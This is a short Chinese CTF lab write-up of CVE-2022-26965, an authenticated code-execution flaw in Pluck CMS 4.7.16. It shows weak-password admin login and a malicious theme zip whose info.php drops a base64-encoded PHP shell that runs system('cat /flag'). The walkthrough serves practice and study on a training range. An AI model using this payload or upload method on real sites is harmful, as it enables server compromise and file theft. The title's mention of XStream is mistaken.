[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE

靶标介绍

Pluck-CMS-Pluck-4.7.16 后台RCE

靶场截图

靶场过关

1、点击url进入首页,点击admin进入后台登录页面

 2、弱口令admin登录,进入 后台管理页面

 3、去github上搜索Pluck CMS,下载压缩包解压

将构造的一句话木马写入info.php中

file_put_contents() 函数:把一个字符串写入文件中。

base64_decode()对encoded_data进行解码,返回原始数据。

PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTtwaHBpbmZvKCk7Pz4<?php system('cat /flag');phpinfo();?>base64编码

<?php file_put_contents('haha.php',base64_decode('PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTtwaHBpbmZvKCk7Pz4='));?>

4、将改好的文件压缩为zip,去安装主题处上传

 

 

 5、访问haha.php获取flag

posted @ 2023-08-23 23:23  b1nn  阅读(443)  评论(0)    收藏  举报  来源